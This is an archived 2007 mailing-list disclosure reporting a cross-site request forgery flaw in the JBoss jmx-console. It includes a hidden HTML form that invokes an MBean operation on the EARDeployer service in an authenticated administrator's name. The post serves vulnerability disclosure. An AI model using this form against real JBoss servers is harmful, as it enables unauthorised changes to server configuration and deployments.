Информационная безопасность
[RU] switch to
English Version



Дополнительная информация

  Небезопасная конфигурация по-умолчанию в JBoss (insecure defaults)

From:buben.razuma_(at)_gmail.com <buben.razuma_(at)_gmail.com>
Date:23 февраля 2007 г.
Subject:JBoss jmx-console CSRF

Hello!
Recent message about JBoss's console made me looking at that interface again and it seems that it is vulnerable for the CRSF attacks.

MBean settings may be changed and operations may be invoked on behalf of the authenticated administrator by the hidden submitting form like follows:

<form method="post" action="http://host:port/jmx-console/HtmlAdaptor">
  <input type="hidden" name="action" value="invokeOp">
  <input type="hidden" name="name" value="jboss.j2ee:service=EARDeployer">

  <input type="hidden" name="methodIndex" value="0">
  <input type="submit" value="Invoke">
</form>

Please, correct me, if I'm wrong.

BR,
B.R.
Best regards,

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru
test server